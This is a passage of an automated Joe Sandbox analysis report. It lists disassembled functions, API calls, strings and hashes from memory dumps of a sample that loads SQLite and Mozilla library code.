Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: c54270305458f61258e2551f56d469756e9d85375da6b675864f5ba64181ee46
Instruction ID: c635636e61c9daa50d7aef90f17bbd02a00a8acd362d6d180f064c5e09d29bb5
Opcode Fuzzy Hash: c54270305458f61258e2551f56d469756e9d85375da6b675864f5ba64181ee46
Instruction Fuzzy Hash: B0A126B0D0C306CBDB00CF94C58669EBBF4AB85348F31C81AD894DB754D779D9A68B92

Function 61E0FCE9 Relevance: 24.2, APIs: 9, Strings: 7, Instructions: 248COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FD0E
memcmp.MSVCRT ref: 61E101F8
memcmp.MSVCRT ref: 61E103BB
memcmp.MSVCRT ref: 61E10580
memcmp.MSVCRT ref: 61E10669
memcmp.MSVCRT ref: 61E1070B

Strings

ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ate, xrefs: 61E105D5
ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: c1250c06479d443b50863cfaca24b1a96d4c7a6c86a02d8b32de734b66d4155d
Instruction ID: 52be5bc32e4a241d7d631e7d354cb647d2df2ea9c6509ea900c66bb21baa7349
Opcode Fuzzy Hash: c1250c06479d443b50863cfaca24b1a96d4c7a6c86a02d8b32de734b66d4155d
Instruction Fuzzy Hash: 9DA127B0D0C306CBDB00DF94C58669EBBF4AB85348F31C81AD890DB754D779D9A68B92

Function 6D5511B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6D551213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6D551285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6D5512B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6D551327

Strings

&, xrefs: 6D55126B
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6D55120D
TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6D5512AD
CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6D55131B
MZx, xrefs: 6D5511E1

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: 22d33c5d4d79c5ea199b6ecff8fa5813175f49a1e8eed5cbf6c6172c0362d7e6
Instruction ID: 2ff1e2c9ef73575a697773e7cb8173f0ba9b4c49ce0fc79fc9ccc40a7c095b4a
Opcode Fuzzy Hash: 22d33c5d4d79c5ea199b6ecff8fa5813175f49a1e8eed5cbf6c6172c0362d7e6
Instruction Fuzzy Hash: 5F71D370A047198BDF1A9F74C810BAEBBF5BF84349F06069FD545A3A40DB346A94CB92

Function 6D5A6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6D5CF618), ref: 6D5A6694
GetThreadId.KERNEL32(?), ref: 6D5A66B1
GetCurrentThreadId.KERNEL32 ref: 6D5A66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6D5A66E1
EnterCriticalSection.KERNEL32(6D5CF618), ref: 6D5A6734
GetCurrentProcess.KERNEL32 ref: 6D5A673A
LeaveCriticalSection.KERNEL32(6D5CF618), ref: 6D5A676C
GetCurrentThread.KERNEL32 ref: 6D5A67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6D5A6868
RtlCaptureContext.NTDLL ref: 6D5A687F

Strings

WalkStack64, xrefs: 6D5A6890

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 036f4c16b62f4b9faa41961e19fb1acac3ba6c7dff840d6c379775a90fe9b401
Instruction ID: 1947f52037162ee51080b6185034e41f3f3ef26b824f28bb280b13bdd71762de
Opcode Fuzzy Hash: 036f4c16b62f4b9faa41961e19fb1acac3ba6c7dff840d6c379775a90fe9b401
Instruction Fuzzy Hash: EA519B71909B12AFDB19CF68C844B6EBBF4FF89710F05882DF59997A40D770E9048B92

Function 6D59D840 Relevance: 19.7, APIs: 13, Instructions: 206threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6D59D85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6D59D86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D59D918
GetCurrentThreadId.KERNEL32 ref: 6D59D93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6D59D948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D59D970
GetCurrentThreadId.KERNEL32 ref: 6D59D976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6D59D982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D59D9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6D59DA2E
GetCurrentThreadId.KERNEL32 ref: 6D59DA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6D59DA78
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D59DAB7

Part of subcall function 6D565C50: GetTickCount64.KERNEL32 ref: 6D565D40
Part of subcall function 6D565C50: EnterCriticalSection.KERNEL32(6D5CF688), ref: 6D565D67

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionTickXbad_function_call@std@@
String ID:
API String ID: 1206815580-0
Opcode ID: ce58da5b5fe69d15fddd21c832e9852f0b7c6fe4c6f6a3b30937febccf3d531b
Instruction ID: 5be6b3a1218c5bfecc15d0113b55334472341ec270e8fa956642add69fe87a77
Opcode Fuzzy Hash: ce58da5b5fe69d15fddd21c832e9852f0b7c6fe4c6f6a3b30937febccf3d531b
Instruction Fuzzy Hash: F9719E356043059FCB04DF29C888B6ABBB5FFC9310F16852EE95A9B701EB30A944CB91

Function 6D59D4D0 Relevance: 19.7, APIs: 13, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6D59D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6D59D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D59D52A
GetCurrentThreadId.KERNEL32 ref: 6D59D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6D59D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D59D55F
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6D59D5D3
GetCurrentThreadId.KERNEL32 ref: 6D59D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6D59D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D59D652
GetCurrentThreadId.KERNEL32 ref: 6D59D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6D59D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D59D6A2

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@
String ID:
API String ID: 554976366-0
Opcode ID: 8888e941e9b42efc7bf2323fe7cc857caf4e32ba7623f6b20e161ddfe37f1968
Instruction ID: d447ba59b29255c97e8a3fd14cb949bcc19399dffaf6ec5bbd0cc1c3a3da214f
Opcode Fuzzy Hash: 8888e941e9b42efc7bf2323fe7cc857caf4e32ba7623f6b20e161ddfe37f1968
Instruction Fuzzy Hash: 5D517C75504B45DFCB04DF34C488A9ABBB4FF89314F018A2EE95A87B10EB30A845CB92

Function 6D541E90 Relevance: 19.6, APIs: 9, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6D5CE784), ref: 6D541EC1
LeaveCriticalSection.KERNEL32(6D5CE784), ref: 6D541EE1
EnterCriticalSection.KERNEL32(6D5CE744), ref: 6D541F38
LeaveCriticalSection.KERNEL32(6D5CE744), ref: 6D541F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6D541F83
LeaveCriticalSection.KERNEL32(6D5CE784), ref: 6D541FC0
EnterCriticalSection.KERNEL32(6D5CE784), ref: 6D541FE2
LeaveCriticalSection.KERNEL32(6D5CE784), ref: 6D541FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6D542019

Strings

D\m, xrefs: 6D541F56
\\m, xrefs: 6D541F3E
D\m, xrefs: 6D541F32
MOZ_CRASH(), xrefs: 6D542000

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: D\m$D\m$MOZ_CRASH()$\\m
API String ID: 2055633661-1616172016
Opcode ID: 547bf1dbc0c46e433e219e40e0ccd18adf4e9a5a495c7c8dff12907c3c843a0f
Instruction ID: 1687844450629c1492d84d55a224568dbf607c294126f65bf162e1040d466fb8
Opcode Fuzzy Hash: 547bf1dbc0c46e433e219e40e0ccd18adf4e9a5a495c7c8dff12907c3c843a0f
Instruction Fuzzy Hash: E941F371B047569BDF189FA88889B6A37F9EF4A344F02402DE904D7B45EBB198108B97

Function 6D56C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6D56C5A3
WideCharToMultiByte.KERNEL32 ref: 6D56C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6D56C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6D56CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D56CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D56CAA5

Strings

0, xrefs: 6D56D30A
(null), xrefs: 6D56C596

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 2cf41bcf9844d88f26f2c2bfa2713000204eec0409bdb92b179812c36aa92318
Instruction ID: 79110b91b5e1c973766fa643a4faa078e40065ef1b6144966003b812fe88bd10
Opcode Fuzzy Hash: 2cf41bcf9844d88f26f2c2bfa2713000204eec0409bdb92b179812c36aa92318
Instruction Fuzzy Hash: A1A1BC306083829FDB19CF28C55476ABBE1BFC9744F058C2DE89997761DB31E805CBA2

Function 6D58DE60 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D58DE73
GetCurrentThreadId.KERNEL32 ref: 6D58DF7D
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58DF8A
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58DFC9
GetCurrentThreadId.KERNEL32 ref: 6D58DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6D554A68), ref: 6D58DE7B

Part of subcall function 6D5894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6D5894EE
Part of subcall function 6D5894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6D589508

Part of subcall function 6D57CBE8: GetCurrentProcess.KERNEL32(?,6D5431A7), ref: 6D57CBF1
Part of subcall function 6D57CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6D5431A7), ref: 6D57CBFA

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6D58DE83
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6D58E00E
<none>, xrefs: 6D58DFD7

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Current$Threadgetenv$ExclusiveLockProcess_getpid$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 3460217314-809102171
Opcode ID: 5b0c79b2c04dd0a20b7d19050fde22d09dda4be6023d4ed9a5f849943715d1ce
Instruction ID: bd916d5debf2529471b30e0ad06a530775e8179f8b6a136900bf48fa08e65b93
Opcode Fuzzy Hash: 5b0c79b2c04dd0a20b7d19050fde22d09dda4be6023d4ed9a5f849943715d1ce
Instruction Fuzzy Hash: 3441D335A05A219FDF189BA4D844B7AB7B5EBC6308F06041EEA0597F02DB759C01CBE2

Function 6D543480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D543492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D5434A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D5434EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6D54350E
__Init_thread_footer.LIBCMT ref: 6D543522
__aulldiv.LIBCMT ref: 6D543552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D54357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D543592

Part of subcall function 6D57AB89: EnterCriticalSection.KERNEL32(6D5CE370,?,?,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284), ref: 6D57AB94
Part of subcall function 6D57AB89: LeaveCriticalSection.KERNEL32(6D5CE370,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D57ABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6D543508
kernel32.dll, xrefs: 6D5434EA

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 7f4716e3320133e6d1f82b6a1896d2206394443b55e54a95602696346047d4d7
Instruction ID: 15a10c51eb5d613968a2f2a127002015be92df5cc74572dce239e30dc3f2864c
Opcode Fuzzy Hash: 7f4716e3320133e6d1f82b6a1896d2206394443b55e54a95602696346047d4d7
Instruction Fuzzy Hash: BC31C47190150A9BEF08DFB9C848FAE77B5FB45705F12841DE515E3A60EB70A940CF62

Function 61E970B9 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 447COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E97281

Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D

Strings

IS ?, xrefs: 61E975EC
= ?, xrefs: 61E97571
SET , xrefs: 61E9732E
WHERE , xrefs: 61E97357
bua, xrefs: 61E97368
UPDATE main., xrefs: 61E9730B
AND , xrefs: 61E97604
bua, xrefs: 61E9733E
idx IS CASE WHEN length(?4)=0 AND typeof(?4)='blob' THEN NULL ELSE ?4 END , xrefs: 61E975CB
sqlite_stat1, xrefs: 61E97504

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: freememcmp
String ID: = ?$ AND $ IS ?$ SET $ WHERE $UPDATE main.$bua$bua$idx IS CASE WHEN length(?4)=0 AND typeof(?4)='blob' THEN NULL ELSE ?4 END $sqlite_stat1
API String ID: 1183899719-1341641573
Opcode ID: 174dedf329261ed8d994897df86d0489eb11c868ed87e24bfa51aa35a0d70313
Instruction ID: 0d5b731b4e6e71452f02b40a28acc7cf76705435dae47c5a45c9821af7cd2139
Opcode Fuzzy Hash: 174dedf329261ed8d994897df86d0489eb11c868ed87e24bfa51aa35a0d70313
Instruction Fuzzy Hash: AE12E774E04259DBDB04CF98D480A9DBBF2BF88308F25C869E855AB351D774E886CF81

Function 61E3C943 Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 360stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 61E3CC03
strncmp.MSVCRT ref: 61E3CC58
strncmp.MSVCRT ref: 61E3CCA9

Strings

null, xrefs: 61E3CBF8
}, xrefs: 61E3CDBB
-, xrefs: 61E3CCF0
true, xrefs: 61E3CC4D
0, xrefs: 61E3CCF9
], xrefs: 61E3CDC5
-, xrefs: 61E3CD00
false, xrefs: 61E3CC9E

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: strncmp
String ID: -$-$0$]$false$null$true$}
API String ID: 1114863663-1443276563
Opcode ID: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
Instruction ID: 7d0d7d581299a88f4ecf4101ed3cb2921062378b47abb911dec42016596cbabc
Opcode Fuzzy Hash: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
Instruction Fuzzy Hash: 4BD1DF70B482768ADB12CFA8C4443DABBF2AFCA318F69C25BD4919B281D739D446C751

Function 6D5AAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6D5AAC52
CreateFileMappingW.KERNEL32 ref: 6D5AAC7D
GetSystemInfo.KERNEL32 ref: 6D5AAC98
MapViewOfFile.KERNEL32 ref: 6D5AACB0
GetSystemInfo.KERNEL32 ref: 6D5AACCD
MapViewOfFile.KERNEL32 ref: 6D5AAD05
UnmapViewOfFile.KERNEL32 ref: 6D5AAD1C
CloseHandle.KERNEL32 ref: 6D5AAD28
UnmapViewOfFile.KERNEL32 ref: 6D5AAD37
CloseHandle.KERNEL32 ref: 6D5AAD43
CloseHandle.KERNEL32 ref: 6D5AAD67

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: adcf4154be80ffd837d0822e583ad2bed66d716066d075c520870f2d26ae50d8
Instruction ID: e61cca1758f978f2450b747f43a94102c1904382f5d3002d8df717a080454905
Opcode Fuzzy Hash: adcf4154be80ffd837d0822e583ad2bed66d716066d075c520870f2d26ae50d8
Instruction Fuzzy Hash: 25314CB19047058FDF00BF78D64866EBBF0BF85705F068A2DE98997611EB709488CB83

Function 6D555E60 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 182threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6D565B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6D5656EE,?,00000001), ref: 6D565B85
Part of subcall function 6D565B50: EnterCriticalSection.KERNEL32(6D5CF688,?,?,?,6D5656EE,?,00000001), ref: 6D565B90
Part of subcall function 6D565B50: LeaveCriticalSection.KERNEL32(6D5CF688,?,?,?,6D5656EE,?,00000001), ref: 6D565BD8
